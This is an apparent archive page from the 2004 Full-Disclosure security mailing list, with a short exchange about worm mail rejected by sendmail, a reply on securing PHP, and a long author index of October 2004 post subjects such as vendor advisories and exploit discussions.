> are known to be part of worms that are by now over 6 months old. Like:
>
> Nov 1 07:16:06 gandalf sendmail[17575]: iA16G3QU017575: ruleset=check_rcpt, arg1=<mary
vanderkooij.org>, relay=[221.232.95.12], reject=550 5.7.0 <mary
vanderkooij.org>... - REJECTED: KEEP YOUR VIRUS JUNK!; SEE ALSO: http://hvdkooij.xs4all.nl/email.cms
> Nov 1 07:16:07 gandalf sendmail[17575]: iA16G3QU017575: lost input channel from [221.232.95.12] to MTA after rcpt
> Nov 1 07:16:07 gandalf sendmail[17575]: iA16G3QU017575: from=<maria
tencent.com>, size=0, class=0, nrcpts=0, proto=ESMTP, daemon=MTA, relay=[221.232.95.12]
>
> If there are that many worms going around it only shows how easy it is to
> write your own little SMTP engine. Spammers may have deployed similar
> backdoors/trojans/bots/...
A lot of stuff out there will also HELO as <yourdomain>, or the IP
address of your MX. I'm pretty sure it's a worm, because I can't think
how any MTA/MUA could be that broken.
--
James Riden / j.riden
massey.ac.nz / Systems Security Engineer
Information Technology Services, Massey University, NZ.
GPG public key available at: http://www.massey.ac.nz/~jriden/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Re: [Full-Disclosure] How secure is PHP ?
From: Gary E. Miller (gem
rellim.com)
Date: Mon Nov 01 2004 - 13:05:15 CST
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Yo Nayana!
On Mon, 1 Nov 2004, Nayana Somaratna wrote:
> However, when browsing the web, I found an article which said that "it
> requires an expert to lockdown php" (Sorry, but I can't quite recall
> the URL).
Saying PHP in insecure is like saying C is insecure. Until their is
a programmer involved, writing bad code, there is no problem. Just like
C if the programmer carefully validates and contrains ALL input then
the program is not only secure but robust.
> So, I'd like to ask the members of this list - how difficult is it to
> secure php ? Do you really need a security "expert" to do this ?
PHP has very good write ups on security in the online doc. Here is the
chapter:
http://www.php.net/manual/en/security.php
If you can read, understand and FOLLOW those recomendatins then you are OK.
If not, then get the assistance of an "expert" that does.
RGDS
GARY
- ---------------------------------------------------------------------------
Gary E. Miller Rellim 20340 Empire Blvd, Suite E-3, Bend, OR 97701
gem
rellim.com Tel:+1(541)382-8588 Fax: +1(541)382-8676
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.3 (GNU/Linux)
iD8DBQFBhoju8KZibdeR3qURAmzpAJ928ofMk+NqtWLPHNg/FwWQ7HE/UwCfVwpW
eANLHG73S0GOZcgi5zyIVW0=
=VsB9
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
1216 messages sorted by: [ date ] [ thread ] [ subject ]
Starting: Fri Oct 01 2004 - 17:29:08 CDT
Ending: Mon Nov 01 2004 - 14:48:28 CST
- .:: DarkDelphi ::.
- 3APA3A
- [Full-Disclosure] Presentation: Bypassing client application protection techniques with notepad (Thu Oct 28 2004 - 07:56:48 CDT)
- Re[2]: [Full-Disclosure] iDEFENSE Security Advisory 10.05.04b: Symantec Norton AntiVirus Reserved Device Name Handling Vulnerability (Wed Oct 06 2004 - 07:09:39 CDT)
- Re: [Full-Disclosure] iDEFENSE Security Advisory 10.05.04b: Symantec Norton AntiVirus Reserved Device Name Handling Vulnerability (Wed Oct 06 2004 - 05:42:57 CDT)
- Re: [Full-Disclosure] iDEFENSE Security Advisory 10.05.04b: Symantec Norton AntiVirus Reserved Device Name Handling Vulnerability (Wed Oct 06 2004 - 06:03:12 CDT)
- Re[2]: [Full-Disclosure] iDEFENSE Security Advisory 10.05.04b: Symantec Norton AntiVirus Reserved Device Name Handling Vulnerability (Wed Oct 06 2004 - 05:25:35 CDT)
- Re: [Full-Disclosure] nmapbot: using instant messaging as a remote administration tool (Tue Oct 05 2004 - 04:49:02 CDT)
- Re[2]: [Full-Disclosure] All Antivirus, Trojan, Spy ware scanner, Nested file manual scan bypass bugs. [Part IV] (Sun Oct 03 2004 - 03:31:26 CDT)
- 404
- \
- _ _
- Aaron Horst
- Abe Usher
- [Full-Disclosure] Sending remote procedure calls through e-mail (RPC-Mail) (Tue Oct 19 2004 - 21:26:43 CDT)
- aCiDBiTS
- Adam Gowdiak
- Adam Jones
- Adeodato Simó
- Airey, John
- Alan Melia (Melmac)
- Alen Capalik
- Re: [Full-Disclosure] Hacking into private files, my credit card purchases, personal correspondence or anything that is mine is trespassing and criminal. (Fri Oct 08 2004 - 18:55:23 CDT)
- Alerta Redsegura
- Alex
- Alex Schultz
- Alex V. Lukyanenko
- Alexander Antipov
- [Full-Disclosure] [MAxpatrol Security Advisory] Multiple vulnerabilities in GoSmart Message Board (Mon Oct 11 2004 - 13:51:07 CDT)
- [Full-Disclosure] [MAxpatrol Security Advisory] Multiple vulnerabilities in GoSmart Message Board (Mon Oct 11 2004 - 07:26:50 CDT)
- Ali Campbell
- Alla Bezroutchko
- allan.vanleeuwen
orangemail.nl
- Als
- altmann
- americanidiot
hushmail.com
- Anders Langworthy
- Andres Tarasco
- Andrew
- Andrew Farmer
- Re: [Full-Disclosure] Windows Time Synchronization - Best Practices (Mon Oct 25 2004 - 14:21:53 CDT)
- Re: [Full-Disclosure] FAKE: RedHat: Buffer Overflow in "ls" and "mkdir" (Sun Oct 24 2004 - 20:18:41 CDT)
- Andrew Poodle
- Andrew Smith
- Re: [Full-Disclosure] Undetectable Virus from CANADA ISP 69.197.83.68 (Fri Oct 22 2004 - 19:52:03 CDT)
- Re: [Full-Disclosure] Norton AntiVirus 2005 treats Radmin as a Virus ??! (Wed Oct 13 2004 - 10:41:30 CDT)
- Andrey Bayora
- [Full-Disclosure] cPanel check only the first 8 characters of webmail password (Thu Oct 21 2004 - 11:26:52 CDT)
- André Malo
- ASB
- Author Travis
- Aviv Raff
- RE: [Full-Disclosure] Re: IE bugs (Was: Web browsers - a mini-farce) (Wed Oct 20 2004 - 11:58:01 CDT)
- RE: [Full-Disclosure] Senior M$ member says stop using passwords completely! (Wed Oct 20 2004 - 01:16:29 CDT)
- Azerail
- backyard
yahoo-inc
- Bakchodiya
- Bankim J. Tejani
- Banta, Will
- RE: [Full-Disclosure] Senior M$ member says stop using passwordscompletely! (Wed Oct 20 2004 - 10:13:10 CDT)
- Barrie Dempster
- Re: [Full-Disclosure] Undetectable Virus from CANADA ISP 69.197.83.68 (Sat Oct 23 2004 - 17:49:12 CDT)
- Re: [Full-Disclosure] Undetectable Virus from CANADA ISP 69.197.83.68 (Sat Oct 23 2004 - 02:32:07 CDT)
- Re: [Full-Disclosure] Sending remote procedure calls through e-mail (RPC-Mail) (Wed Oct 20 2004 - 06:28:50 CDT)
- Re: [Full-Disclosure] Re: Re: Any update on SSH brute force attempts? (Tue Oct 19 2004 - 05:47:56 CDT)
- Barry Fitzgerald
- Re: [Full-Disclosure] Will a vote for John Kerry be counted by a Hart InterCivic eSlate3000 in Honolulu? (Fri Oct 22 2004 - 15:47:42 CDT)
- Re: [Full-Disclosure] Will a vote for John Kerry be counted by a HartInterCivic eSlate3000 in Honolulu? (Fri Oct 22 2004 - 09:49:33 CDT)
- Re: [in] Re: [Full-Disclosure] Will a vote for John Kerry be counted by a Hart InterCivic eSlate3000 in Honolulu? (Fri Oct 22 2004 - 10:14:20 CDT)
- Re: [Full-Disclosure] Will a vote for John Kerry be counted by a Hart InterCivic eSlate3000 in Honolulu? (Fri Oct 22 2004 - 09:32:34 CDT)
- Re: [Full-Disclosure] Will a vote for John Kerry be counted by aHartInterCivic eSlate3000 in Honolulu? - OT (Fri Oct 22 2004 - 09:39:38 CDT)
- Re: [Full-Disclosure] EEYE: Windows VDM #UD Local Privilege Escalation (Wed Oct 13 2004 - 09:50:49 CDT)
- Re: [Full-Disclosure] EEYE: Windows VDM #UD Local Privilege Escalation (Wed Oct 13 2004 - 08:48:11 CDT)
- Bart.Lansing
kohls.com
- Re: [in] Re: [Full-Disclosure] Will a vote for John Kerry be countedby a Hart InterCivic eSlate3000 in Honolulu? (Fri Oct 22 2004 - 08:27:15 CDT)
- Re: [Full-Disclosure] Will a vote for John Kerry be counted by a Hart InterCivic eSlate3000 in Honolulu? (Thu Oct 21 2004 - 09:29:11 CDT)
- Re: [Full-Disclosure] RE: [Full-Disclosure]Open the doors to hell hire a hicker Full-Disclosure Posts (Tue Oct 19 2004 - 08:09:48 CDT)
- Ben Hawkes
- Berend-Jan Wever
- Bernardo Santos Wernesback
- Bernhard Kuemel
- BillyBob
- BillyBobKnob
- bipin gautam
- Re: [Full-Disclosure] Rendering binary file as HTML makes Mozilla Firefox stop responding or crash (Tue Oct 26 2004 - 12:09:16 CDT)
- Re: [Full-Disclosure] EEYE: Windows Shell ZIP File Decompression DUNZIP32.DLL Buffer Overflow Vulnerability (Thu Oct 14 2004 - 08:56:42 CDT)
- Re: [Full-Disclosure] iDEFENSE Security Advisory 10.05.04b: Symantec Norton AntiVirus Reserved Device Name Handling Vulnerability (Tue Oct 05 2004 - 22:02:46 CDT)
- Re: [Full-Disclosure] All Antivirus, Trojan, Spy ware scanner, Nested file manual scan bypass bugs. [Part IV] (Sat Oct 02 2004 - 12:57:52 CDT)
- Re: [Full-Disclosure] (confirm) Antivirus, Trojan, Spy ware scanner, Nested file manual scan bypass bugs. [Part IV] (Sat Oct 02 2004 - 09:03:35 CDT)
- Re: [Full-Disclosure] (confirm) Antivirus, Trojan, Spy ware scanner, Nested file manual scan bypass bugs. [Part IV] (Sat Oct 02 2004 - 09:03:22 CDT)
- Re: [Full-Disclosure] All Antivirus, Trojan, Spy ware scanner, Nested file manual scan bypass bugs. [Part IV] (Sat Oct 02 2004 - 08:02:24 CDT)
- Re: [Full-Disclosure] All Antivirus, Trojan, Spy ware scanner, Nested file manual scan bypass bugs. [Part IV] (Sat Oct 02 2004 - 07:54:56 CDT)
- Re: [Full-Disclosure] All Antivirus, Trojan, Spy ware scanner, Nested file manual scan bypass bugs. [Part IV] (Fri Oct 01 2004 - 23:14:54 CDT)
- Re: [Full-Disclosure] All Antivirus, Trojan, Spy ware scanner, Nested file manual scan bypass bugs. [Part IV] (Fri Oct 01 2004 - 23:15:13 CDT)
- Björn Scorey
- Bobby Pope
- BoneMachine
- bowwow
nowhere.org
- Re: [Full-Disclosure] xpire.info & splitinfinity.info - exploits in the wild (Sun Oct 24 2004 - 08:18:05 CDT)
- Brent J. Nordquist
- Brett Campbell
- Brett Moore
- Brian Smith-Sweeney
- Brown, James (Jim)
- Bruno Wolff III
- bug free
- Bugzilla
- Burnes, James
- Byron L. Sonne
- Re: [in] Re: [Full-Disclosure] Will a vote for John Kerry be counted by a Hart InterCivic eSlate3000 in Honolulu? (Thu Oct 21 2004 - 16:35:05 CDT)
- Re: [Bulk] RE: [Full-Disclosure] House approves spyware legislation (Thu Oct 07 2004 - 21:02:11 CDT)
- cab75
comcast.net
- Calum Power
- Re: [Full-Disclosure] Slashdot: Gmail Accounts Vulnerable to XSS Exploit (Sat Oct 30 2004 - 21:07:20 CDT)
- Carl
- Carr, Robert
- Cassidy Macfarlane
- Castigliola, Angelo
- Cedric Blancher
- Cesar
- Chintan Trivedi
- chows
ozemail.com.au
- Chris Anley
- Chris DeVoney
- Chris Locke
- Chris Umphress
- chris_tang
so-net.com.hk
- Christian
- Christian Kujau
- Christian Leber
- Christian.Loretan
swisstopo.ch
- Christoph Jeschke
- chunky
lhqi.com
- Clairmont, Jan M
- [Full-Disclosure] RE: [Full-Disclosure]Open the doors to hell hire a hicker Full-Disclosure Posts (Mon Oct 18 2004 - 09:28:39 CDT)
- RE: [Full-Disclosure] Hacking into private files, my credit card purchases, personal correspondence or anything that is mine is trespassing and criminal. (Fri Oct 08 2004 - 13:33:09 CDT)
- [Full-Disclosure] Hacking into private files, my credit card purchases, personal correspondence or anything that is mine is trespassing and criminal. (Fri Oct 08 2004 - 09:00:00 CDT)
- class 101
- Collin
- contact
airscanner.com
- Cory Whitesell
- Cullen, Michael
- Curt Purdy
- Cushing, David
- Cyrille Barthelemy
- D B
- d31337
- Dan Margolis
- DAN MORRILL
- DanB UK
- Daniel Bachfeld
- Daniel H. Renner
- Daniel Milisic
- Daniel Sichel
- Daniel Veditz
- Re: [Full-Disclosure] Mozilla Thunderbird 0.8 / Firefox 0.9.3 temporary files (local) (Mon Oct 25 2004 - 06:08:53 CDT)
- Danny
- Re: [Full-Disclosure] Undetectable Virus from CANADA ISP 69.197.83.68 (Fri Oct 22 2004 - 22:19:45 CDT)
- Re: [Full-Disclosure] Windows 2000 Remote Buffer Overflow by class101 (Fri Oct 22 2004 - 15:14:18 CDT)
- Re: [Full-Disclosure] Senior M$ member says stop using passwords completely! (Thu Oct 21 2004 - 16:00:19 CDT)
- Re: [Full-Disclosure] Senior M$ member says stop using passwords completely! (Wed Oct 20 2004 - 09:56:37 CDT)
- Darren Reed
- darren windham
- dave
- Dave Aitel
- Dave D. Cawley
- Dave Ewart
- Dave Horsfall
- Dave King
- David Hane
- David Jungerson
- David Maynor
- David Stein
- David Vincent
- David.vincent
- Debasis Mohanty
- debian-security-announce
lists.debian.org
- [Full-Disclosure] [SECURITY] [DSA 580-1] New iptables packages fix modprobe failure (Mon Nov 01 2004 - 10:31:33 CST)
- [Full-Disclosure] [SECURITY] [DSA 579-1] New abiword packages fix arbitrary code execution (Mon Nov 01 2004 - 09:51:45 CST)
- [Full-Disclosure] [SECURITY] [DSA 578-1] New mpg123 packages fix arbitrary code execution (Mon Nov 01 2004 - 07:33:16 CST)
- [Full-Disclosure] [SECURITY] [DSA 577-1] New postgresql packages fix symlink vulnerability (Fri Oct 29 2004 - 05:20:33 CDT)
- [Full-Disclosure] [SECURITY] [DSA 576-1] New Squid packages fix several vulnerabilities (Fri Oct 29 2004 - 00:41:12 CDT)
- [Full-Disclosure] [SECURITY] [DSA 575-1] New catdoc packages fix temporary file vulnerability (Thu Oct 28 2004 - 08:58:47 CDT)
- [Full-Disclosure] [SECURITY] [DSA 574-1] New cabextract packages fix unintended directory traversal (Thu Oct 28 2004 - 00:09:04 CDT)
- [Full-Disclosure] [SECURITY] [DSA 573-1] New cupsys packages fix arbitrary code execution (Thu Oct 21 2004 - 09:18:22 CDT)
- [Full-Disclosure] [SECURITY] [DSA 572-1] New ecartis packages fix unauthorised access to admin interface (Thu Oct 21 2004 - 05:38:14 CDT)
- [Full-Disclosure] [SECURITY] [DSA 571-1] New libpng3 packages fix several vulnerabilities (Wed Oct 20 2004 - 12:01:10 CDT)
- [Full-Disclosure] [SECURITY] [DSA 570-1] New libpng packages fix several vulnerabilities (Wed Oct 20 2004 - 11:04:49 CDT)
- [Full-Disclosure] [SECURITY] [DSA 556-2] New netkit-telnet packages really fix denial of service (Mon Oct 18 2004 - 05:31:37 CDT)
- [Full-Disclosure] [SECURITY] [DSA 569-1] New netkit-telnet-ssl packages fix denial of service (Mon Oct 18 2004 - 02:29:57 CDT)
- [Full-Disclosure] [SECURITY] [DSA 568-1] New cyrus-sasl-mit packages fix arbitrary code execution (Sat Oct 16 2004 - 03:27:59 CDT)
- [Full-Disclosure] [SECURITY] [DSA 567-1] New libtiff packages fix remote code execution (Fri Oct 15 2004 - 12:51:16 CDT)
- [Full-Disclosure] [SECURITY] [DSA 566-1] New CUPS packages fix information leak (Thu Oct 14 2004 - 10:27:26 CDT)
- [Full-Disclosure] [SECURITY] [DSA 563-3] New cyrus-sasl packages fix arbitrary code execution on sparc and arm (Thu Oct 14 2004 - 09:47:43 CDT)
- [Full-Disclosure] [SECURITY] [DSA 565-1] New sox packages fix buffer overflow (Wed Oct 13 2004 - 08:34:36 CDT)
- [Full-Disclosure] [SECURITY] [DSA 564-1] New mpg123 packages fix arbitrary code exceution (Wed Oct 13 2004 - 08:00:34 CDT)
- [Full-Disclosure] [SECURITY] [DSA 563-2] New cyrus-sasl packages really fix arbitrary code execution (Tue Oct 12 2004 - 11:54:23 CDT)
- [Full-Disclosure] [SECURITY] [DSA 563-1] New cyrus-sasl packages fix arbitrary code execution (Tue Oct 12 2004 - 07:52:50 CDT)
- [Full-Disclosure] [SECURITY] [DSA 561-1] New libxpm packages fix several vulnerabilities (Mon Oct 11 2004 - 02:42:09 CDT)
- [Full-Disclosure] [SECURITY] [DSA 562-1] New mysql packages fix several vulnerabilities (Mon Oct 11 2004 - 04:24:18 CDT)
- [Full-Disclosure] [SECURITY] [DSA 458-3] New python2.2 packages really fix buffer overflow and restore functionality (Sun Oct 10 2004 - 02:38:28 CDT)
- [Full-Disclosure] [SECURITY] [DSA 560-1] New lesstif packages fix several vulnerabilities (Thu Oct 07 2004 - 08:32:27 CDT)
- [Full-Disclosure] [SECURITY] [DSA 600-1] New samba packages fix arbitrary file access (Thu Oct 07 2004 - 02:45:17 CDT)
- [Full-Disclosure] [SECURITY] [DSA 559-1] New net-acct packages fix insecure temporary file creation (Wed Oct 06 2004 - 07:39:02 CDT)
- [Full-Disclosure] [SECURITY] [DSA 558-1] New libapache-mod-dav packages fix potential denial of service (Wed Oct 06 2004 - 02:32:58 CDT)
- defiance
- Deigo Dude
- Denis Dimick
- Derek Soeder
- devis
- Re: [Full-Disclosure] Undetectable Virus from CANADA ISP 69.197.83.68 (Sun Oct 24 2004 - 09:26:25 CDT)
- digitalchaos
- dirk
- Dogo
- DogoBrazil
- Dominic Hargreaves
- [Full-Disclosure] [FLSA-2004:2089] Updated mozilla packages fix security vulnerabilities (Wed Oct 27 2004 - 04:17:53 CDT)
- [Full-Disclosure] [FLSA-2004:1804] Updated kernel resolves security vulnerabilities (Mon Oct 18 2004 - 04:40:36 CDT)
- [Full-Disclosure] [FLSA-2004:2102] Updated samba packages fix security vulnerability [updated] (Thu Oct 14 2004 - 18:20:06 CDT)
- [Full-Disclosure] [FLSA-2004:2102] Updated samba packages fix security vulnerability (Wed Oct 13 2004 - 12:40:41 CDT)
- [Full-Disclosure] [FLSA-2004:1257] Updated netpbm packages fix security vulnerabilities (Fri Oct 08 2004 - 04:01:22 CDT)
- [Full-Disclosure] [FLSA-2004:1735] Updated cvs packages fix security vulnerabilities (Thu Oct 07 2004 - 12:12:44 CDT)
- Dominick Baier
- doubles
hush.com
- Dragos Ruiu
- Dragos Stefan Pamparau
- Drew Copley
- DSardina
- Duncan Hill
- Dunceor .
- Eddie
- Eduard Warkentin
- Elia Florio
- Re: [Full-Disclosure] Hackers of [xpire.info] use an unknown Apache 1.3.27 exploit??? (Fri Oct 29 2004 - 05:37:10 CDT)
- [Full-Disclosure] Hackers of [xpire.info] use an unknown Apache 1.3.27 exploit??? (Thu Oct 28 2004 - 09:44:08 CDT)
- Re: [Full-Disclosure] xpire.info & splitinfinity.info - exploits in the wild (Wed Oct 27 2004 - 05:17:08 CDT)
- Re: [Full-Disclosure] xpire.info & splitinfinity.info - exploits in the wild (Tue Oct 26 2004 - 18:22:06 CDT)
- Eliurkis
- Elliott Bäck
- ennis
mts.net
- Eric Paynter
- Re: [Full-Disclosure] Senior M$ member says stop using passwords completely! (Mon Oct 18 2004 - 12:31:32 CDT)
- Eric Scher
- Etaoin Shrdlu
- Evans, Arian
- Evert Daman
- evilninja
- Exibar
- Re: [in] Re: [Full-Disclosure] Will a vote for John Kerry be counted by a Hart InterCivic eSlate3000 in Honolulu? (Thu Oct 21 2004 - 11:57:48 CDT)
- Re: [in] Re: [Full-Disclosure] Will a vote for John Kerry be counted by a Hart InterCivic eSlate3000 in Honolulu? (Thu Oct 21 2004 - 15:10:06 CDT)
- Re: [Full-Disclosure] Senior M$ member says stop using passwords completely! (Thu Oct 21 2004 - 12:06:58 CDT)
- Fabio
- Farrukh Hussain
- Feher Tamas
- [Full-Disclosure] FAKE: RedHat: Buffer Overflow in "ls" and "mkdir" (Mon Oct 25 2004 - 05:18:24 CDT)
- [Full-Disclosure] Norton AntiVirus 2005 treats Radmin as a Virus ??! (Wed Oct 13 2004 - 04:38:36 CDT)
- [Full-Disclosure] JPEG GDI+ (MS04-028) Exploit at www.splitinfinity.info (Mon Oct 11 2004 - 06:48:15 CDT)
- [Full-Disclosure] Zeroize equipment is necessary for your server room. (Fri Oct 08 2004 - 04:05:28 CDT)
- Fixer
- Florian Rock
- Frank de Wit
- Frank Knobbe
- RE: [Full-Disclosure] Windows Time Synchronization - Best Practices (Thu Oct 21 2004 - 22:13:51 CDT)
- RE: [Full-Disclosure] Senior M$ member says stop using passwords completely! (Tue Oct 19 2004 - 17:28:32 CDT)
- Re: [Full-Disclosure] Senior M$ member says stop using passwords completely! (Sat Oct 16 2004 - 11:59:48 CDT)
- Frederic Charpentier
- FreeBSD Security Advisories
- FRLinux
- Gadi Evron
- Garth Stone
- Gary E. Miller
- Re: [Full-Disclosure] Windows Time Synchronization - Best Practices (Sun Oct 24 2004 - 20:48:07 CDT)
- RE: [Full-Disclosure] Windows Time Synchronization - Best Practices (Thu Oct 21 2004 - 16:47:25 CDT)
- Gary Kline
- Georgi Guninski
- Re: [Full-Disclosure] Update: Web browsers - a mini-farce (MSIE gives in) (Sun Oct 31 2004 - 12:13:31 CST)
- Re: [Full-Disclosure] Senior M$ member says stop using passwords completely! (Thu Oct 21 2004 - 15:52:18 CDT)
- Re: [Full-Disclosure] Senior M$ member says stop using passwords completely! (Wed Oct 20 2004 - 09:01:56 CDT)
- Re: [Full-Disclosure] Writing Trojans that bypass Windows XP Service Pack 2 Firewall (Tue Oct 12 2004 - 14:55:03 CDT)
- Re: [Full-Disclosure] Re: real spam from secure<img src="/imgs/at.gif" border=0 align=middle>microsoft.com ? (Wed Oct 06 2004 - 15:17:56 CDT)
- Geraldo Rivera
- Geza Papp dr (Axelero)
- Giselbert Hinkelmann
- Goencz, Otto
- Gossi The Dog
- Gregh
- Re: [Full-Disclosure] Will a vote for John Kerry be counted byaHartInterCivic eSlate3000 in Honolulu? - OT (Thu Oct 21 2004 - 08:07:34 CDT)
- Re: [Full-Disclosure] Will a vote for John Kerry be counted by aHartInterCivic eSlate3000 in Honolulu? - OT (Wed Oct 20 2004 - 22:54:42 CDT)
- Gregory Gilliss
- GreyMagic Security
- GuidoZ
- Re: [SPAM] Re: [Full-Disclosure] Re: I will be awaiting your immediate response. (Sun Oct 31 2004 - 13:14:53 CST)
- Re: [Full-Disclosure] Re: I will be awaiting your immediate response. (Sun Oct 31 2004 - 13:23:16 CST)
- Re: [Full-Disclosure] Re: I will be awaiting your immediate response. (Sun Oct 31 2004 - 00:18:56 CDT)
- [Full-Disclosure] Re: [Full-Disclosure] [moderator!] Re: VersandbestĐ´tigung : AW : Re: [SPAM] Fw: [Full-Disclosure] Joke.cpl ??? (Fri Oct 29 2004 - 14:48:21 CDT)
- Re: [Full-Disclosure] RE: Full-Disclosure digest, Vol 1 #1955 - 19 msgs (Fri Oct 08 2004 - 01:22:50 CDT)
- Re: [Full-Disclosure] RE: Full-Disclosure digest, Vol 1 #1955 - 19 msgs (Thu Oct 07 2004 - 01:15:47 CDT)
- Re: [Full-Disclosure] Paranid ramblings - what's the deal? Bounded variables aren't? (Thu Oct 07 2004 - 01:09:25 CDT)
- Re: [Full-Disclosure] real spam from secure<img src="/imgs/at.gif" border=0 align=middle>microsoft.com ? (Wed Oct 06 2004 - 18:28:24 CDT)
- Re: [Full-Disclosure] Paranid ramblings - what's the deal? Bounded variables aren't? (Tue Oct 05 2004 - 18:51:25 CDT)
- Re: [Full-Disclosure] Spyware installs with no interaction in IE on fully patched XP SP2 box (Tue Oct 05 2004 - 01:33:11 CDT)
- Re: [Full-Disclosure] Spyware installs with no interaction in IE on fully patched XP SP2 box (Tue Oct 05 2004 - 01:37:24 CDT)
- Re: [Full-Disclosure] Re: Spyware installs with no interaction in IE on fully patched XP SP2 box (Tue Oct 05 2004 - 01:27:46 CDT)
- Re: [Full-Disclosure] Spyware installs with no interaction in IE on fully patched XP SP2 box (Sun Oct 03 2004 - 14:29:09 CDT)
- H D Moore
- Habonator _
- Harlan Carvey
- Re: [Full-Disclosure] Norton AntiVirus 2005 treats Radmin as a Virus ??! (Tue Oct 12 2004 - 12:40:07 CDT)
- Re: [Full-Disclosure] Hacking into private files, my credit card purchases, personal correspondence or anything that is mine is trespassing and criminal. (Fri Oct 08 2004 - 11:36:26 CDT)
- Re: [Full-Disclosure] Hacking into private files, my credit card purchases, personal correspondence or anything that is mine is trespassing and criminal. (Fri Oct 08 2004 - 11:26:52 CDT)
- Harry de Grote
- Re: [Full-Disclosure] Re: getting administrator rights on win2003 machine? (Thu Oct 28 2004 - 10:54:02 CDT)
- Harry Hoffman
- Henrik Boegh
- Hexstream Virus Alert
- Home Security
- Honza Vlach
- http-equiv
excite.com
- http-equiv
excite.com
- Hugo van der Kooij
- Re: [SPAM] Re: [Full-Disclosure] Re: I will be awaiting your immediate response. (Sun Oct 31 2004 - 03:38:36 CST)
- Re: [SPAM] Re: [Full-Disclosure] xpire.info & splitinfinity.info - exploits in the wild (Wed Oct 27 2004 - 15:13:04 CDT)
- Re: [SPAM] Re: [Full-Disclosure] xpire.info & splitinfinity.info - exploits in the wild (Wed Oct 27 2004 - 01:05:44 CDT)
- [Full-Disclosure] FAKE: RedHat: Buffer Overflow in "ls" and "mkdir" (Sun Oct 24 2004 - 17:59:18 CDT)
- Re: [SPAM] Re: [SPAM] [Full-Disclosure] Your daily internet traffic report (Sun Oct 17 2004 - 04:19:23 CDT)
- Re: [SPAM] Re: [SPAM] [Full-Disclosure] Your daily internet traffic report (Sat Oct 16 2004 - 17:16:37 CDT)
- Ian Holm
- Idan Nahoum
- idlabs-advisories
idefense.com
- [Full-Disclosure] iDEFENSE Security Advisory 10.27.04: PuTTY SSH2_MSG_DEBUG Buffer Overflow Vulnerability (Wed Oct 27 2004 - 11:34:45 CDT)
- [Full-Disclosure] iDEFENSE Security Advisory 10.22.04: Novell SuSe Linux LibTIFF Heap Overflow Vulnerability (Fri Oct 22 2004 - 12:29:08 CDT)
- [Full-Disclosure] iDEFENSE Security Advisory 10.18.04: Multiple Vendor Anti-Virus Software Detection Evasion Vulnerability (Mon Oct 18 2004 - 10:17:55 CDT)
- [Full-Disclosure] iDEFENSE Security Advisory 10.11.04: Squid Web Proxy Cache Remote Denial of Service Vulnerability (Mon Oct 11 2004 - 10:55:04 CDT)
- [Full-Disclosure] iDEFENSE Security Advisory 10.07.04: RealNetworks Helix Server Content-Length Denial of Service Vulnerability (Thu Oct 07 2004 - 13:09:13 CDT)
- [Full-Disclosure] iDEFENSE Security Advisory 10.06.04a: MySQL MaxDB Web Agent WebDBM Server Name Denial of Service Vulnerability (Wed Oct 06 2004 - 10:40:13 CDT)
- Igor Buchmueller
- Ill will
- insecure
- irfan.syed
guoco.com
- ISNYC
- Isshogei
- Ivan Krstic
- J.A. Terranson
- Re: [Full-Disclosure] Windows 2000 Remote Buffer Overflow by class101 (Sat Oct 23 2004 - 13:08:27 CDT)
- Re: [Full-Disclosure] Will a vote for John Kerry be counted by a HartInterCivic eSlate3000 in Honolulu? (Thu Oct 21 2004 - 22:30:15 CDT)
- Re: [Full-Disclosure] Will a vote for John Kerry be counted by a HartInterCivic eSlate3000 in Honolulu? (Wed Oct 20 2004 - 22:36:06 CDT)
- Jakob Balle
- James Bliss
- James Edwards
- James Lay
- James Riden
- James Tucker
- Re: [Full-Disclosure] Microsoft Windows Huge Text Processing Instability (Mon Oct 18 2004 - 05:57:38 CDT)
- James.McKinlay
cnm.co.uk
- jamie fisher
- Janusz A. Urbanowicz
- Jason
- Jason Coombs PivX Solutions
- [Full-Disclosure] Will a vote for John Kerry be counted by a Hart InterCivic eSlate3000 in Honolulu? (Wed Oct 20 2004 - 21:27:39 CDT)
- Re: [Full-Disclosure] RE: Disclosure policy in Re: RealPlayervulnerabilities (Sat Oct 09 2004 - 02:43:09 CDT)
- Jay Jacobson
- Jay Libove
- Jean-Baptiste Marchand
- Jean-Marie Monnier
- Jedi/Sector One
- Jeff Price
- Jei
- Jelmer
- Jelson Pat
- Jeremy Bishop
- Jeroen Massar
- Jesse Ruderman
- Jesse Valentin
- [Full-Disclosure] Exploit code Available for previously announced MS Vulnerabilities (Thu Oct 21 2004 - 10:53:26 CDT)
- Re: [Full-Disclosure] RE: [Full-Disclosure]Open the doors to hell hire a hicker Full-Disclosure Posts (Wed Oct 20 2004 - 09:50:37 CDT)
- Re: [Full-Disclosure] FDA Approves Use of Chip in Patients ? HIPAA woes? (Fri Oct 15 2004 - 09:22:58 CDT)
- [Full-Disclosure] FDA Approves Use of Chip in Patients ? HIPAA woes? (Thu Oct 14 2004 - 12:38:20 CDT)
- Re: [Full-Disclosure] Hacking into private files, my credit card purchases, personal correspondence or anything that is mine is trespassing and criminal. (Tue Oct 12 2004 - 09:44:44 CDT)
- Re: [Full-Disclosure] Hacking into private files, my credit card purchases, personal correspondence or anything that is mine is trespassing and criminal. (Mon Oct 11 2004 - 18:33:07 CDT)
- Re: [Full-Disclosure] Hacking into private files, my credit card purchases, personal correspondence or anything that is mine is trespassing and criminal. (Mon Oct 11 2004 - 18:10:27 CDT)
- Re: [Full-Disclosure] Hacking into private files, my credit card purchases, personal correspondence or anything that is mine is trespassing and criminal. (Mon Oct 11 2004 - 14:29:48 CDT)
- Jftucker
- Jian Hui Wang
- Jim Race
- Jkuperus
- joe
- RE: [Full-Disclosure] Windows Time Synchronization - Best Practices (Fri Oct 22 2004 - 08:28:58 CDT)
- Joe Hood
- Joe Random
- Joe Stewart
- Joe Szilagyi
- Joel R. Helgeson
- John Cartwright
- John Creegan
- Jordan T-H
- Joshua Levitsky
- Juergen Schmidt
- Karol Więsek
- Kaveh Mofidi
- Keifer, Trey
- Keith Pachulski
- Ken S
- Kenneth Ng
- Kevin
